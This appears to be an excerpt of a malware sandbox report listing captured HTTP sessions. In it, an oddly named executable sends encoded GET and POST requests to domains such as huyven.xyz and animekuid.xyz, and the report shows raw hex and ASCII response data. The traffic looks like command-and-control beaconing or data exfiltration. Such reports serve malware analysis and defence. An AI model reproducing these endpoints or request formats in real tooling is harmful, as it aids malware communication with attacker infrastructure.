                                                                                                                    Data Ascii: FbuX5DnP=cTIUWh1emFd8FCc3cecR4a7GYDeEPVOB3s7Oa3GHMn+ESQDaHe6jZM12FbxNiQ8v7EG6mTOPPeMPhbc7cQg4LVpe1xzNykewKSpWERTNhkJ+7qgPGi8+Jzzv/x3AYWKTs5HZQ++NF3YPkq0bESgVC87cij/10a2z47vJQxvRfDp0yxrayWCQRdLQ25PiEqGiY7OU+hZ9zss2GRV9Y4VtDlob+35ENvsNuY9uE4unobohFKbxeg2DiTBSiIG2fm9FO8ykBP3ouZ4dvHyWktoWMxAMd5aHPNLBO9wI4UXWG1z+CNSqKRiLkC9cfkeqR6rdQmoq5jRAZzmBVLnon5JlQ5BkD95cNPHUKZMiPCaEo9cKs4ilU38XFKdfBscVrPZuoqiZxPVYhcYZbQVCyqv03pxEBZAT/fS5eFJPJ/azcXjsNyXLTwDCy6IR51Hm1rtg6DHp0oEQTF22gcjVB6G3BH6hca8Hj7NW9I+/br+FaqE2pA0Tzzd7lAmd24ABXWLTGLkyspF0S5SIIaprur0363wu0Wq7QLkYKgPM0S5M72qPCmb0rsjPG8i7LwZyD3WeCFKUKXbGm45788WTX1nr2RXsme/2PIkZ79iVQFpcz5M2FX460ntbyiOrtHWmqVLdKdKJErBKjo7amhuX6JQ8u9Pej7InDeC3v3InxgFRwLFwJAx3tJzedFwD8tnAofnPs8VYX4C1NSJlA3VsIRc0uejFfPUTpfYkZnrMnIgcnVrgmuE7ZsnuxTXJSkkJ5dewY6MknhTps72MJ/qkCo1pUM5TYAKs2BoGIikPS2BOTShfK/nZS+01SsdcbL+hBLvXIFBIOSgV0b8L15u1pfo3YzVsykL83XotOhSafwhnsJ6w0koDlIU0wMiB7Iq7PULhz99zFdN8pfEQHhxgdrbKMkn3/GH+dmtha+vw7m1/qNwW2DxiuE0MIYPVTu/LeCd6lYfZ3M6G7S0Ck0YlT6mclx/dAjSiRnQlHWZUTwkpmww [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:58:06.299690008 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:05 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <https://animekuid.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Content-Encoding: br
                                                                                                                    Content-Length: 9101
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 13 c4 bc 14 91 98 0f 80 8a c0 b8 89 8f 75 9e ef 3f 35 f5 ff eb 78 e6 16 fd 31 32 4f 26 5f 00 10 1b 57 99 ca b6 df c5 8e ef 66 7b 34 20 09 4a 8c b9 0d 01 59 54 14 55 fd 6f 7f d3 be bf 7c 53 b5 33 c0 08 87 d4 a9 b3 9b da 95 e2 29 76 0e b1 28 53 7e ef ed ae e6 87 bb f1 bf 3b 60 e6 c0 03 67 0e 04 e9 01 e3 00 a4 c6 03 2a bc 7d bb 7f ff dd e1 40 66 05 90 92 15 03 14 23 e4 10 42 e7 71 d3 a7 d8 16 10 d0 50 73 a5 4a c7 d2 8f d1 6c db 67 29 16 82 84 97 ef ef c5 e5 cb 89 cf 7b 85 4f 8c 08 ac 13 5f 8e f4 fb e7 c4 95 90 88 b8 ca eb 78 0c d5 de b7 e4 23 a2 20 d8 90 f5 21 53 d1 bd af 69 1b 03 e2 0b 27 d4 f9 28 01 d6 f9 15 6c 74 5d 7b f8 aa 17 c9 91 e9 c9 cd 35 3a 93 3e bd 77 b8 e9 bf 9c 01 00 5c ae d0 91 c2 30 5f cb 51 37 db f1 84 7d 4d 36 6d a8 62 b4 43 8a 8e bc 12 75 0c 4d a7 ae 8e 72 6c ab fc e0 a6 ea 0b b8 d9 0a fd e0 00 17 11 10 e6 6f c6 f9 12 5e f6 4d 67 3e ef 3e be d9 9b d9 3d 3f bb 6c 9b fe 01 e6 3f 80 dd 77 ab 87 de 59 4a 9a e3 7a 6c 6c 87 01 ee 93 e7 c8 fa 8b f2 af da 99 a9 d1 ed b3 8f e5 d0 5b 54 03 59 [TRUNCATED]
                                                                                                                    Data Ascii: u?5x12O&_Wf{4 JYTUo|S3)v(S~;`g*}@f#BqPsJlg){O_x# !Si'(lt]{5:>w\0_Q7}M6mbCuMrlo^Mg>>=?l?wYJzll[TY&"09N(c}jKk4i7[B2T-Cce2elA47^d!N rNI;Rb/A9V8qo9qX(0OR,TrMWCQx\++Z5 X8KDXD)yC<9FEjQFVsfn\!yx$\,pyHTA)L=RvW#H_H{8qy=52q6F]@0d{.__7>o].k*:~$1Vg:RyHt89iLuU@V]Cb1:adf2$#s>n74{Q9vIUxo#i]<@LRE;?)hD:gw
                                                                                                                    Sep 30, 2024 19:58:06.299815893 CEST124INData Raw: f6 8d 43 63 61 ed c0 94 68 5c 99 a9 70 59 39 5f 97 6e 93 d7 e0 5e 71 b8 c0 80 2d 36 cb b8 93 a0 f4 cc a8 9b 0e f1 4d 97 1f c5 ec 25 be 19 eb 6c 66 b0 52 56 c9 54 1f 75 22 8f 3f ff ce fc 56 7b fe 69 69 8d b5 cd d0 5f bb 61 d2 1b 43 ad 71 1f 9d e9
                                                                                                                    Data Ascii: Ccah\pY9_n^q-6M%lfRVTu"?V{ii_aCqCUal|iT1zUCUcaCK
                                                                                                                    Sep 30, 2024 19:58:06.299928904 CEST1236INData Raw: 3f 6a 4b 85 ae 09 52 3b a1 fb 21 7c 6c 68 dd b4 ed 37 33 3b cf 61 86 99 ae 97 b9 bc a6 df f8 a6 e9 9d 14 2f a7 49 1f 3c 43 37 c6 a9 33 37 f8 8d 76 3a fb 98 ae 27 7b 57 f9 78 ca bd 7a ad ee 4f 08 5c 23 a3 b5 55 1d 55 cf ec 95 ec c6 0c 76 5a e4 6f
                                                                                                                    Data Ascii: ?jKR;!|lh73;a/I<C737v:'{WxzO\#UUvZo&|$Z5s /vU"]UnWVcND:sg}Rh/okBQLnqk*<z95z6"*xuKu50
                                                                                                                    Sep 30, 2024 19:58:06.299942017 CEST1236INData Raw: 5e 36 ef 6c a6 a6 02 c8 dd f7 7d 66 5f 4d df 0e f8 f5 d0 db a1 d5 16 77 43 af cb e1 d7 78 70 0d 97 97 f4 71 6d 34 31 5d b9 ff 9f a6 2b 4c 85 a7 5c 25 b8 ae 98 4c be 62 7c dd 12 0f 79 4a f2 2a ae a2 39 b2 35 b5 43 5f a7 6e 06 ab 2a 7a 36 4e 04 40
                                                                                                                    Data Ascii: ^6l}f_MwCxpqm41]+L\%Lb|yJ*95C_n*z6N@Zr\CxOQ4f4]cQ<qXqG^t]:4"4](I6A6WMki"ZXi"pnBFXV[B[jv@L v5T|
                                                                                                                    Sep 30, 2024 19:58:06.299953938 CEST1236INData Raw: 26 0e dd af 77 06 32 ba 95 e7 f3 39 2b 01 f3 94 30 79 f0 07 45 04 cb 80 51 a5 26 d3 ad b6 5a 9e d7 28 1e 54 bd f2 cb aa f0 48 69 78 1e 8c 8e 5b 50 71 1c 8c df 5f 49 65 32 98 bc af 90 b2 08 fb e2 35 42 7e 99 97 e9 ba cd 20 1a e7 8f 83 29 6a f1 26
                                                                                                                    Data Ascii: &w29+0yEQ&Z(THix[Pq_Ie25B~ )j&p;*|\`kRdLEwDl>^Y95V_NnH?nXP`v[+*G,9|b,c3V}?LaYcb112`R,;'Cy(LN=
                                                                                                                    Sep 30, 2024 19:58:06.299979925 CEST1236INData Raw: 32 53 80 5c 11 01 e7 02 2a 9a 55 f3 b8 29 82 6b d5 cc f4 8e c1 88 f8 e6 72 00 26 45 da 70 b1 59 7f 3f 85 30 d8 92 db 93 fa f7 be 87 ae ca b6 e4 36 0e fb d2 8c ef 75 db 5d 2a 63 c0 26 f8 06 c6 11 06 3f 48 9a a6 d0 1a ed b3 b1 2d 84 91 b0 ad c1 55
                                                                                                                    Data Ascii: 2S\*U)kr&EpY?06u]*c&?H-U @j4:/~"i)JYB_yjUg[v8;(pi ESp<m>CJJfcj7yRD6tjRx26uiZP'Ls&
                                                                                                                    Sep 30, 2024 19:58:06.299994946 CEST1236INData Raw: bb c5 aa 59 f5 94 c2 88 ba 5e 22 84 af 88 6b e5 eb 18 8f b0 4c 6b e7 5d 16 66 af 7e 69 1f 37 3f 8e af b1 be 80 ff 89 ea 5e 1a 3e c0 b1 08 2c 95 da 47 20 87 60 4d be 1a e6 1c 2d 7a 62 61 11 46 10 72 41 b6 0d 05 5b fe d2 6c 89 30 28 f5 4e 0a d9 d1
                                                                                                                    Data Ascii: Y^"kLk]f~i7?^>,G `M-zbaFrA[l0(NkV}h[T9*D,[e\F%I*"ZZ"p8sacvjin!3YEU)!\p)T?Tx<fk]"55SWE&(1Lnt:ETj"RP+0AB%8
                                                                                                                    Sep 30, 2024 19:58:06.300008059 CEST1120INData Raw: 95 cc 04 34 f8 ed b3 2f b1 85 d3 d3 0e f9 07 26 18 a7 0a 94 a2 f1 99 cd 88 9e f0 f7 7c b9 cd 42 32 d8 f7 a9 a8 fc c2 65 44 23 10 3c fa a0 84 2a b9 a4 d2 aa 3b 45 01 67 34 6e 9e 21 d4 a3 14 25 83 be 29 e9 11 93 6b fc 61 f4 6f d8 72 c1 68 08 9c 2b
                                                                                                                    Data Ascii: 4/&|B2eD#<*;Eg4n!%)kaorh+)Mi2B5Q*s;(~o:GX[c_{zl'3$43_8*}_pFOYBVjSl[hWaZg\:<\?x!e.+)O
                                                                                                                    Sep 30, 2024 19:58:06.300019026 CEST831INData Raw: 8f 3f b2 b9 7c 4c 28 39 bf 5f d9 ac 5f ae 49 4a c9 62 92 b5 72 1f 2b 88 34 ad 03 a6 46 da d4 6c b7 2e 54 c5 d3 fe 06 c0 1f 5d 8f 88 4d 14 db 45 85 18 d4 41 00 20 97 1b 25 27 ef 0e 8c 51 c8 c0 a6 6e 73 ae 13 db a5 ad 23 07 a5 7c a1 d7 e3 7a 57 e6
                                                                                                                    Data Ascii: ?|L(9__IJbr+4Fl.T]MEA %'Qns#|zW^o_d9t\30q("haZR//9Xg/yIF^sLZLm9!XdW\mF,6[e-2?|/SkZ?C70CeRiz


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.549728203.175.9.128804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:07.408763885 CEST474OUTGET /7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A== HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.animekuid.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:58:08.829647064 CEST536INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:08 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Location: http://animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A==
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Sep 30, 2024 19:58:08.839890003 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.549729162.0.238.246804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:14.022892952 CEST725OUTPOST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 42 57 33 6b 68 62 4f 51 41 2f 4c 49 30 62 62 65 4b 73 39 59 62 33 73 6d 76 53 77 71 5a 52 49 43 6f 31 67 35 43 38 39 48 7a 54 50 73 42 77 4d 53 45 65 4d 61 33 31 74 6e 33 4c 46 56 38 42 47 38 69 59 4c 67 36 39 32 4b 5a 34 30 56 66 6d 55 4a 53 66 6b 49 2b 6d 4b 38 4a 35 64 49 74 6d 34 49 71 38 7a 58 32 72 78 56 41 37 36 6a 2f 44 56 71 6d 38 69 52 6c 67 70 61 75 56 68 35 73 6e 52 69 2b 4c 6d 2f 59 4c 75 52 54 51 41 47 55 58 59 6c 6e 68 53 38 62 76 74 6f 47 6c 30 77 78 6d 52 46 45 6c 48 4e 4d 6b 33 73 76 53 47 79 30 77 68 49 33 6d 77 44 4d 55 36 50 46 38 3d
                                                                                                                    Data Ascii: FbuX5DnP=oYOmP/NSGiFpLBW3khbOQA/LI0bbeKs9Yb3smvSwqZRICo1g5C89HzTPsBwMSEeMa31tn3LFV8BG8iYLg692KZ40VfmUJSfkI+mK8J5dItm4Iq8zX2rxVA76j/DVqm8iRlgpauVh5snRi+Lm/YLuRTQAGUXYlnhS8bvtoGl0wxmRFElHNMk3svSGy0whI3mwDMU6PF8=
                                                                                                                    Sep 30, 2024 19:58:14.598086119 CEST595INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:14 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.549730162.0.238.246804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:16.562277079 CEST745OUTPOST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 68 47 33 68 43 44 4f 59 41 2f 45 45 55 62 62 45 36 73 68 59 62 72 73 6d 75 57 67 72 72 46 49 43 4a 46 67 36 41 55 39 45 7a 54 50 6d 68 77 4a 50 30 65 53 61 33 77 51 6e 33 33 46 56 38 6c 47 38 6d 55 4c 67 74 70 31 4c 4a 34 32 5a 2f 6d 57 55 43 66 6b 49 2b 6d 4b 38 4a 73 77 49 73 43 34 4a 61 4d 7a 46 43 2f 77 4c 51 37 35 31 76 44 56 37 32 38 6d 52 6c 67 4c 61 73 78 48 35 71 6a 52 69 37 33 6d 34 4e 72 76 4b 44 51 38 62 6b 57 38 73 57 63 44 35 72 72 43 6e 55 6c 78 6f 58 71 7a 4e 53 49 74 58 75 73 66 2f 50 2b 2b 69 6e 34 57 5a 48 48 5a 5a 76 45 4b 52 53 6f 70 4a 57 6e 4a 2f 63 53 6b 6c 44 4b 6f 2b 6f 6e 7a 62 4f 45 6d
                                                                                                                    Data Ascii: FbuX5DnP=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrrFICJFg6AU9EzTPmhwJP0eSa3wQn33FV8lG8mULgtp1LJ42Z/mWUCfkI+mK8JswIsC4JaMzFC/wLQ751vDV728mRlgLasxH5qjRi73m4NrvKDQ8bkW8sWcD5rrCnUlxoXqzNSItXusf/P++in4WZHHZZvEKRSopJWnJ/cSklDKo+onzbOEm
                                                                                                                    Sep 30, 2024 19:58:17.150734901 CEST595INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:17 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.549731162.0.238.246804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:58:19.117880106 CEST1762OUTPOST /dbbh/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.huyven.xyz
                                                                                                                    Origin: http://www.huyven.xyz
                                                                                                                    Referer: http://www.huyven.xyz/dbbh/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 6f 59 4f 6d 50 2f 4e 53 47 69 46 70 4c 68 47 33 68 43 44 4f 59 41 2f 45 45 55 62 62 45 36 73 68 59 62 72 73 6d 75 57 67 72 71 39 49 43 66 5a 67 34 6d 63 39 46 7a 54 50 39 68 77 49 50 30 66 4f 61 33 49 63 6e 33 37 37 56 2b 4e 47 2b 44 49 4c 77 4d 70 31 43 4a 34 32 52 66 6d 58 4a 53 66 4c 49 2b 32 4f 38 4a 38 77 49 73 43 34 4a 5a 55 7a 47 57 72 77 4a 51 37 36 6a 2f 44 6a 71 6d 38 4f 52 6c 70 32 61 73 31 78 34 61 44 52 73 2f 72 6d 39 2b 44 76 58 54 51 45 59 6b 57 6b 73 57 52 62 35 72 6e 6b 6e 56 51 65 6f 51 75 7a 4f 6e 39 50 4e 74 38 4a 39 4f 4b 68 67 56 59 6c 4d 67 50 64 48 4d 55 68 61 77 35 49 53 32 6a 62 6f 70 6d 39 73 53 76 52 6a 70 76 6f 53 4b 70 75 67 5a 6c 48 4c 47 63 61 4d 55 67 78 66 74 50 69 35 43 4d 39 6b 63 49 48 7a 66 78 4c 77 6f 46 50 37 61 6f 59 6b 41 50 62 65 76 66 4c 37 4c 76 30 6c 78 78 4e 33 34 46 53 57 56 71 74 6a 65 57 2b 7a 5a 46 6e 49 50 62 69 62 32 6a 2f 39 79 4d 50 62 6e 6a 73 42 36 73 6e 4e 78 4a 38 45 34 30 52 30 6d 43 64 47 64 5a 34 69 56 67 59 4c [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=oYOmP/NSGiFpLhG3hCDOYA/EEUbbE6shYbrsmuWgrq9ICfZg4mc9FzTP9hwIP0fOa3Icn377V+NG+DILwMp1CJ42RfmXJSfLI+2O8J8wIsC4JZUzGWrwJQ76j/Djqm8ORlp2as1x4aDRs/rm9+DvXTQEYkWksWRb5rnknVQeoQuzOn9PNt8J9OKhgVYlMgPdHMUhaw5IS2jbopm9sSvRjpvoSKpugZlHLGcaMUgxftPi5CM9kcIHzfxLwoFP7aoYkAPbevfL7Lv0lxxN34FSWVqtjeW+zZFnIPbib2j/9yMPbnjsB6snNxJ8E40R0mCdGdZ4iVgYLQwO5CqMjyxJdBbK6OCvdgK5nm8cmfNeq1TH0YmhaiOeRo0mXiV3hU+VKMBZbx71hWk7R41Y1XRrZ5IHITLjeSnN+MdtdWNXptUFuZ7dd5aCtLD0y34WRbyky6sT03b0wzOMg9NilYsUDsI9lyB+H+cgMB8p+OG980VLCdhfCkPwLGahEBh3/ebNR7uRuCOXM6L8cDO6JQRziTu2cVKSgazt8vGTkqM7feaG+HWKbmFiAWL5Izpb9TeEdyXRiph+3fnpp6WVDDVdVL3medufoMKi4ZU7ipoJ1UkZ+/Bkz3/H5TFeVjSUUls/oHdofMHYjs2o2M4Dir23q06IQxNkP2Hg/uojvYleDXh6eV52kDToaGbx7nppZbZyv4KOFlVFGem2j5x5Itf3KIJzwJN24wgqHVeyc8LwsBmfzprLRfGI6F06QPn42RG45JvLY3WmNCRQXDXGL3egvlS3QrmMMHhLMa0T9rdYKUHmM0caVrI31YK8JTe1Eht11wQIqA7lsbSD2KbJLmzpBnXdz2t+B9ughmRUW6oDGGEnS0moNdRvtb/TZq3NCD86FNmh2+doT2rIb4aMDkG7WvhgnhmvTcqjmM57trIAe1EnoiT2Py6muvmQNaoP3qG3bm/C+WlHaSDCKOLmbvg6jA61mB/mH/eqNOhShZIeEO0 [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:58:19.706927061 CEST595INHTTP/1.1 404 Not Found
                                                                                                                    Date: Mon, 30 Sep 2024 17:58:19 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 389
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
